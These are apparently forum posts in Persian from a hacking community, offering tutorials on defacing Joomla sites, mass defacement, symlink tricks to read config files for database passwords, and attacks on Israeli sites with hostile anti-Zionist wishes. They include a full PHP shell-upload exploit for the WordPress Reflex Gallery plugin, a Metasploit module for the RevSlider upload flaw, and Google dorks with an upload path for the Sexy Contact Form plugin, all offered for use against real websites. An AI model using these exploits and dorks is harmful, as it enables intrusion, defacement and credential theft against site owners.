Content];"); } fclose($op); //if(!preg_match('#NO RESULTS FOUND#i',$data)) break; } ?>
  14. سلام خدمت دوستان عزیز گارد ایران. در این تاپیک میخوام یک باگ پرایوت رو پابلیک کنم. در این ویدیو شما یاد خواهید گرفت که چگونه صفحه دیفیس خودتون رو در سایت جوملا آپ کنید و در زون به ثبت برسونیدش. سایت های هک شده pass:guardiran.org برای استفاده از آموزش ابتدا همه ی پارتهارو دانلود کرده سپس در یک پوشه اکسترکت نمایید. یا حق Bandicam.part1.rar Bandicam.part2.rar Bandicam.part3.rar Bandicam.part4.rar Bandicam.part5.rar
  15. DeMoN

    باگهای سایت های اسراییلی

    سلام خدمت عزیزان گارد ایران.خوب دوستان,من در این تاپییک قصد دارم که به همراه شما باگهای سایت های اسراییلی رو بررسی کنم. امیدوارم از آموزش ها نهایت و بهره و ببرین. به امید روزی که صهیونیست و استکبار و ظالم از صفحه روزگار محو شوند. یا حق
  16. سلام خدمت دوستان عزیز گارد ایران. خوب دوستان,براتون آموزشی مفید رو آماده کردم که امیدوارم به دردتون بخوره.آموزش کامل مس دیفیس. pass:guardiran.org برای استفاده از آموزش ها ابتدا تمامی پارت ها را دانلود کرده و در یک پوشه اکسترکت نمایید. لینک ابزار پوتی پیشنهاد میکنم دوستانی که اطلاعاتی در این زمینه ندارن ابتدا لینک زیر رو مشاهده کند. لینک آموزش سیملینک زدن برای خواندن فایلهای کنفیگ رو هم قرار دادم. سیملینک یا حق manual mass deface.part1.rar manual mass deface.part2.rar manual mass deface.part3.rar
  17. سلام خدمت دوستان عزیز گارد ایران. خوب در این درس تصویری شما رو با نحوه ی سیملینک زدن آشنا میکنم. شاید از خودتون بپرسین سیملینک چیست؟ خوب در جواب باید بگم که سیملینک برای خواندن فایلهای کانفیگ و استخراج یوزر و پسورد و نام دیتابیس استفاده میشه که با این یوزر و پس میتونین به دیتا بیس وصل بشین. به دوستان تازه وارد پیشنهاد میکنم که یک نگاهی به لینک زیر بندازید تا با این متد آشنایی بیشتری پیدا کنید. [Hidden Content] Pass:guardiran.org یا حق symlink.part01.rar symlink.part02.rar
  18. DeMoN

    کتاب آموزش کامل SQL Injection

    سلام خدمت دوستان عزیز گارد ایران. براتون کتابی آماده کردم در حوضه باگ امنیتی SQL Injection که در این کتاب شما با تمامی مفاهیم،دستورات و نکات باگ SQL آشنا خواهید شد. پیشنهاد میکنم که حتما اینکتاب رو دانلود و مطالعه کنند خصوصا عزیزان تازه وارد. Pass:guardiran.org یاحق SQLInjection.rar
  19. DeMoN

    اکسپلویت آپلود شل در wordpress

    <?php /* # Exploit Title: Wordpress Plugin Reflex Gallery - Arbitrary File Upload # TIPE: Arbitrary File Upload # Google DORK: inurl:"wp-content/plugins/reflex-gallery/" # Vendor: [Hidden Content] # Tested on: Linux # Version: 3.1.3 (Last) # EXECUTE: php exploit.php www.alvo.com.br shell.php # OUTPUT: Exploit_AFU.txt # POC [Hidden Content] # REF COD [Hidden Content] -------------------------------------------------------------------------------- <form method = "POST" action = "" enctype = "multipart/form-data" > <input type = "file" name = "qqfile"><br> <input type = "submit" name = "Submit" value = "Pwn!"> </form > -------------------------------------------------------------------------------- # AUTOR: Cleiton Pinheiro / Nick: googleINURL # Blog: [Hidden Content] # Twitter: [Hidden Content] # Fanpage: [Hidden Content] # Pastebin [Hidden Content] # GIT: [Hidden Content] # PSS: [Hidden Content] # YOUTUBE [Hidden Content] */ error_reporting(1); set_time_limit(0); ini_set('display_errors', 1); ini_set('max_execution_time', 0); ini_set('allow_url_fopen', 1); ob_implicit_flush(true); ob_end_flush(); function __plus() { ob_flush(); flush(); } function __request($params) { $objcurl = curl_init(); curl_setopt($objcurl, CURLOPT_URL, "{$params['host']}/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2015&Month=03"); curl_setopt($objcurl, CURLOPT_POST, 1); curl_setopt($objcurl, CURLOPT_HEADER, 1); curl_setopt($objcurl, CURLOPT_REFERER, $params['host']); curl_setopt($objcurl, CURLOPT_POSTFIELDS, array('qqfile' => "@{$params['file']}")); curl_setopt($objcurl, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1); $info['corpo'] = curl_exec($objcurl) . __plus(); $info['server'] = curl_getinfo($objcurl) . __plus(); curl_close($objcurl) . __plus(); return $info; } echo "[+] Wordpress Plugin Reflex Gallery - Arbitrary File Upload Vulnerability\n\n"; $params = array('file' => isset($argv[2]) ? $argv[2] : exit("\n0x[ERRO] DEFINE FILE SHELL!\n"), 'host' => isset($argv[1]) ? (strstr($argv[1], 'http') ? $argv[1] : "[Hidden Content]]}") : exit("\n0x[ERRO] DEFINE TARGET!\n")); __request($params) . __plus(); $_s = "{$params['host']}/wp-content/uploads/2015/03/{$params['file']}"; $_h = get_headers("{$params['host']}/wp-content/uploads/2015/03/{$params['file']}", 1); foreach ($_h as $key => $value) { echo date("h:m:s") . " [INFO][{$key}]:: {$value}\n"; } $_x = (strstr(($_h[0] . (isset($_h[1]) ? $_h[1] : NULL)), '200')); print "\n" . date("h:m:s") . " [INFO][COD]:: " . (!empty($_x) ? '[+] VULL' : '[-] NOT VULL'); print "\n" . date("h:m:s") . " [INFO][SHELL]:: " . (!empty($_x) ? "[+] {$_s}" . file_put_contents("Exploit_AFU.txt", "{$_s}\n\n", FILE_APPEND) : '[-] ERROR!'); WordPress Reflex Gallery 3.1.3 Shell Upload حالشو ببرین یا حق
  20. DeMoN

    اکسپلویت آپلود فایل در wordpress

    ## # This module requires Metasploit: [Hidden Content] # Current source: [Hidden Content] ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::HTTP::Wordpress include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Wordpress RevSlider File Upload and Execute Vulnerability', 'Description' => %q{ This module exploits an arbitrary PHP code upload in the WordPress ThemePunch Revolution Slider ( revslider ) plugin, version 3.0.95 and prior. The vulnerability allows for arbitrary file upload and remote code execution. }, 'Author' => [ 'Simo Ben youssef', # Vulnerability discovery 'Tom Sellers <tom[at]fadedcode.net>' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['URL', '[Hidden Content]'], ['EDB', '35385'], ['WPVDB', '7954'], ['OSVDB', '115118'] ], 'Privileged' => false, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['ThemePunch Revolution Slider (revslider) 3.0.95', {}]], 'DisclosureDate' => 'Nov 26 2015', 'DefaultTarget' => 0) ) end def check release_log_url = normalize_uri(wordpress_url_plugins, 'revslider', 'release_log.txt') check_version_from_custom_file(release_log_url, /^\s*(?:version)\s*(\d{1,2}\.\d{1,2}(?:\.\d{1,2})?).*$/mi, '3.0.96') end def exploit php_pagename = rand_text_alpha(4 + rand(4)) + '.php' # Build the zip payload_zip = Rex::Zip::Archive.new # If the filename in the zip is revslider.php it will be automatically # executed but it will break the plugin and sometimes WordPress payload_zip.add_file('revslider/' + php_pagename, payload.encoded) # Build the POST body data = Rex::MIME::Message.new data.add_part('revslider_ajax_action', nil, nil, 'form-data; name="action"') data.add_part('update_plugin', nil, nil, 'form-data; name="client_action"') data.add_part(payload_zip.pack, 'application/x-zip-compressed', 'binary', "form-data; name=\"update_file\"; filename=\"revslider.zip\"") post_data = data.to_s res = send_request_cgi( 'uri' => wordpress_url_admin_ajax, 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data ) if res if res.code == 200 && res.body =~ /Update in progress/ # The payload itself almost never deleted, try anyway register_files_for_cleanup(php_pagename) # This normally works register_files_for_cleanup('../revslider.zip') final_uri = normalize_uri(wordpress_url_plugins, 'revslider', 'temp', 'update_extract', 'revslider', php_pagename) print_good("#{peer} - Our payload is at: #{final_uri}") print_status("#{peer} - Calling payload...") send_request_cgi( 'uri' => normalize_uri(final_uri), 'timeout' => 5 ) elsif res.code == 200 && res.body =~ /^0$/ # admin-ajax.php returns 0 if the 'action' 'revslider_ajax_action' is unknown fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable or the plugin is deactivated") else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") end else fail_with(Failure::Unknown, 'ERROR') end end end WordPress RevSlider 3.0.95 File Upload / Execute یا حق
  21. DeMoN

    s*e*x&y contact form auto Exploiter

    سلام خدمت دوستان گارد ایران. همراه شما هستیم با آموز. هک سایت با " cms"sexy contact .فقط شما باید یکخورده خلاقیت به خرج بدین و دورک جدید براش بسارین،این دورکش یکخورده قدیمیه و تعداد تارگت هاش کمه. خوب بریم سراغ آموزش: ابتدا دورک زیر رو در گوگل جست و جوکنید: Powered by sexycontact\" site:gr inurl:/sexy-contact-form سپس به آخر سایت اکسپلویت زیر را اضافه کنید. components/com_sexycontactform/fileupload/index.php به صورت زیر: Www.site.com/components/com_sexycontactform/fileupload/index.php به امید روزی که هیچ سایت sexy در فضای مجازی وجود نداشته باشه. یاحق
×
×
  • ایجاد مورد جدید...